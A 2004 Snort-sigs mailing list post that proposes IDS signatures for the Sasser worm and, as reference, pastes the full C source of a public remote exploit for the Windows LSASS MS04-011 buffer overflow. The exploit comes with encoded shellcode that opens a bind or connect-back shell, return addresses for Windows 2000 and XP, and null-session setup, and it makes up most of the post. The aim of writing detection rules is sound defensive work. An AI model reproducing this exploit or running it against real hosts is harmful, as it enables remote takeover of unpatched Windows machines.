[Snort-sigs] Sasser rules report [20040503-1456]

benoit.donneaux at ...2445... benoit.donneaux at ...2445...
Mon May 3 06:00:12 EDT 2004


I'm looking for confirmation that rules match Sasser :

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 ( sid: 1000041; rev: 1; msg: \"LSLass MS-0411 exploit\"; flow: established,to_server; content:\"|eb10 5a4a 33c9 66b9 7d01 8034 0a99 e2fa eb05 e8eb ffff|\"; reference:url,www.secuser.com/alertes/2004/sasser.htm; classtype: shellcode-detect;)
alert tcp $HOME_NET any -> $EXTERNAL_NET 9996 ( sid: 1000042; rev: 3; msg:\"Sasser ftp script to transfer up.exe\"; content:\"|5F75702E657865|\"; depth:250; flags:A+; reference:url,www.secuser.com/alertes/2004/sasser.htm; classtype: misc-activity;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 5554 ( sid: 1000043; rev: 1; msg:\"Sasser binary transfer get up.exe\"; content:\"|5F75702E657865|\"; depth:250; flags:A+; reference:url,www.secuser.com/alertes/2004/sasser.htm; classtype: misc-activity;)

I know the first one is too large, but I'll try to match exact lsass exploit regarding the sample :
// Comments from K-OTik.COM : to make this exploit work remotely you have to use the 
// sbaaNetapi.dll wich modifies the DsRoleUpgradeDownlevelServer API, this will allow 
// the remote host to be specified as explained on eeye advisory...
//
// http://www.k-otik.com/exploits/04252004.ms04011lsass.rar

#include <windows.h>
#pragma comment(lib,\"mpr.lib\")
#pragma comment(lib, \"ws2_32\")
unsigned char scode[] =
\"\\xEB\\x10\\x5B\\x4B\\x33\\xC9\\x66\\xB9\\x25\\x01\\x80\\x34\\x0B\\x99\\xE2\\xFA\"
\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
\"\\x70\\x62\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\x02\\x99\\x99\\x99\"
\"\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\"
\"\\x71\\xF3\\x9D\\xC0\\x71\\x1B\\x99\\x99\\x99\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\"
\"\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\\x89\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\"
\"\\xD9\\xC9\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\\x99\\x99\\x98\\xF1\\x9B\\x99\\x9D\"
\"\\x4B\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\\x81\\x1C\\x59\\xEC\\xD3\\xF1\\xFA\"
\"\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\\x14\\xA5\\xBD\\xF3\\x8C\\xC0\\x32\"
\"\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA4\\x10\\xC5\\xBD\\xD1\\x10\"
\"\\xC5\\xBD\\xD5\\x10\\xC5\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\xCD\\xC9\\xC8\\xC8\\xC8\"
\"\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\"
\"\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\\xCF\\x95\\xC8\\xCF\\x12\\xDC\\xA5\"
\"\\x12\\xCD\\xB1\\xE1\\x9A\\x4C\\xCB\\x12\\xEB\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\"
\"\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\"
\"\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC3\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\"
\"\\x95\\xD2\\x12\\xC3\\x85\\x9A\\x44\\x12\\x9D\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\"
\"\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\"
\"\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\"
\"\\xF9\\x7E\\xE0\\x5F\\xE0\";

unsigned char scode2[] =
\"\\xEB\\x10\\x5A\\x4A\\x33\\xC9\\x66\\xB9\\x7D\\x01\\x80\\x34\\x0A\\x99\\xE2\\xFA\"
\"\\xEB\\x05\\xE8\\xEB\\xFF\\xFF\\xFF\"
\"\\x70\\x95\\x98\\x99\\x99\\xC3\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
\"\\xE9\\x85\\x34\\x12\\xD9\\x91\\x12\\x41\\x12\\xEA\\xA5\\x12\\xED\\x87\\xE1\\x9A\"
\"\\x6A\\x12\\xE7\\xB9\\x9A\\x62\\x12\\xD7\\x8D\\xAA\\x74\\xCF\\xCE\\xC8\\x12\\xA6\"
\"\\x9A\\x62\\x12\\x6B\\xF3\\x97\\xC0\\x6A\\x3F\\xED\\x91\\xC0\\xC6\\x1A\\x5E\\x9D\"
\"\\xDC\\x7B\\x70\\xC0\\xC6\\xC7\\x12\\x54\\x12\\xDF\\xBD\\x9A\\x5A\\x48\\x78\\x9A\"
\"\\x58\\xAA\\x50\\xFF\\x12\\x91\\x12\\xDF\\x85\\x9A\\x5A\\x58\\x78\\x9B\\x9A\\x58\"
\"\\x12\\x99\\x9A\\x5A\\x12\\x63\\x12\\x6E\\x1A\\x5F\\x97\\x12\\x49\\xF3\\x9A\\xC0\"
\"\\x71\\x1E\\x99\\x99\\x99\\x1A\\x5F\\x94\\xCB\\xCF\\x66\\xCE\\x65\\xC3\\x12\\x41\"
\"\\xF3\\x9C\\xC0\\x71\\xED\\x99\\x99\\x99\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\\xF3\\x9B\"
\"\\x66\\xCE\\x75\\x12\\x41\\x5E\\x9E\\x9B\\x99\\x9D\\x4B\\xAA\\x59\\x10\\xDE\\x9D\"
\"\\xF3\\x89\\xCE\\xCA\\x66\\xCE\\x69\\xF3\\x98\\xCA\\x66\\xCE\\x6D\\xC9\\xC9\\xCA\"
\"\\x66\\xCE\\x61\\x12\\x49\\x1A\\x75\\xDD\\x12\\x6D\\xAA\\x59\\xF3\\x89\\xC0\\x10\"
\"\\x9D\\x17\\x7B\\x62\\x10\\xCF\\xA1\\x10\\xCF\\xA5\\x10\\xCF\\xD9\\xFF\\x5E\\xDF\"
\"\\xB5\\x98\\x98\\x14\\xDE\\x89\\xC9\\xCF\\xAA\\x50\\xC8\\xC8\\xC8\\xF3\\x98\\xC8\"
\"\\xC8\\x5E\\xDE\\xA5\\xFA\\xF4\\xFD\\x99\\x14\\xDE\\xA5\\xC9\\xC8\\x66\\xCE\\x79\"
\"\\xCB\\x66\\xCE\\x65\\xCA\\x66\\xCE\\x65\\xC9\\x66\\xCE\\x7D\\xAA\\x59\\x35\\x1C\"
\"\\x59\\xEC\\x60\\xC8\\xCB\\xCF\\xCA\\x66\\x4B\\xC3\\xC0\\x32\\x7B\\x77\\xAA\\x59\"
\"\\x5A\\x71\\x76\\x67\\x66\\x66\\xDE\\xFC\\xED\\xC9\\xEB\\xF6\\xFA\\xD8\\xFD\\xFD\"
\"\\xEB\\xFC\\xEA\\xEA\\x99\\xDA\\xEB\\xFC\\xF8\\xED\\xFC\\xC9\\xEB\\xF6\\xFA\\xFC\"
\"\\xEA\\xEA\\xD8\\x99\\xDC\\xE1\\xF0\\xED\\xCD\\xF1\\xEB\\xFC\\xF8\\xFD\\x99\\xD5\"
\"\\xF6\\xF8\\xFD\\xD5\\xF0\\xFB\\xEB\\xF8\\xEB\\xE0\\xD8\\x99\\xEE\\xEA\\xAB\\xC6\"
\"\\xAA\\xAB\\x99\\xCE\\xCA\\xD8\\xCA\\xF6\\xFA\\xF2\\xFC\\xED\\xD8\\x99\\xFB\\xF0\"
\"\\xF7\\xFD\\x99\\xF5\\xF0\\xEA\\xED\\xFC\\xF7\\x99\\xF8\\xFA\\xFA\\xFC\\xE9\\xED\"
\"\\x99\\xFA\\xF5\\xF6\\xEA\\xFC\\xEA\\xF6\\xFA\\xF2\\xFC\\xED\\x99\";

typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long, 
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define LEN 3500
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];
int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;
LPSTR hostipc[40];
NETRESOURCE netResource; 
unsigned short port;
unsigned long ip;
unsigned char* sc;
if (argc < 3) {
printf(\"Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\\n \\bug discoveried by eEye,\\n \\
code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\\n \\
Usage: \\n \\
%s 0 targetip (Port ConnectBackIP ) \\
----> attack 2k (tested on cn sp4,en sp4)\\n \\
%s 1 targetip (Port ConnectBackIP ) \\
----> attack xp (tested on cn sp1)\\n\",argv[0],argv[0]);
printf(\"\");
return 0; 
}
target = argv[2];
sprintf((char *)hostipc,\"\\\\\\\\%s\\\\ipc$\",target); 
netResource.lpLocalName = NULL; 
netResource.lpProvider = NULL; 
netResource.dwType = RESOURCETYPE_ANY; 
netResource.lpRemoteName=(char *)hostipc;

ret = WNetAddConnection2(&netResource, \"\", \"\", 0); // attempt a null session 
if (ret != 0) 
{ 
printf(\"Create NULL session failed\\n\");
// return 1; 
} 

hNetapi = LoadLibrary(\"sbaaNetapi.dll\");
if (!hNetapi) {
printf(\"Can't load sbaaNetapi.dll.\\n\");
exit(0);
}
(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, \"DsRoleUpgradeDownlevelServer\");
if (!DsRoleUpgradeDownlevelServer) {
printf(\"Can't find function.\\n\");
exit(0);
}
memset(buf, '\\x90', LEN);

if(argc>4)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;
memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
} 
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);
}
sc=scode2;
}
//attack all 2k sp3 version
memcpy(&buf[2020], \"\\x95\\x0c\\x01\\x78\", 4);
memcpy(&buf[2036], sc, strlen(sc));
//attack all 2k sp4 version 
memcpy(&buf[2840], \"\\xeb\\x06\\xeb\\x06\", 4);
memcpy(&buf[2844],\"\\x2b\\x38\\x03\\x78\",4);
memcpy(&buf[2856], sc, strlen(sc));

printf(\"shellcode size %d\\n\", strlen(sc));

for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,\"\\xad\\x14\\x48\\x74\",4);
memcpy(&sendbuf[1948], \"\\xb8\\x44\\xf8\\xff\\xff\\x03\\xc4\\x81\\xec\\x00\\x20\\x00\\x00\\xff\\xe0\\x00\", 16);
memcpy(&sendbuf[1980], \"\\xeb\\xde\",2);
}
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2);
ret=0;
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], 
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);
printf(\"Ret value = %d\\n\",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE); 
FreeLibrary(hNetapi); 
return 0;
}
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20040503/2d011c3b/attachment.html>


More information about the Snort-sigs mailing list